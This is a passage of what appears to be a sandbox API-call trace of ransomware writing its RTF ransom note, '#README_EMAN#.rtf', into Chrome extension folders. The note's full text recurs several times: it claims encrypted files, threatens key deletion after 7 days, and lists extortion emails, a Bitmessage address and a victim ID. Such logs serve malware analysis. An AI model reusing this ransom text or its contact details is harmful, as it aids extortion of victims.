\\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.575] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.576] CloseHandle (hObject=0x2c8) returned 1 [0278.576] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0278.576] GetLastError () returned 0x2 [0278.576] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.576] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your 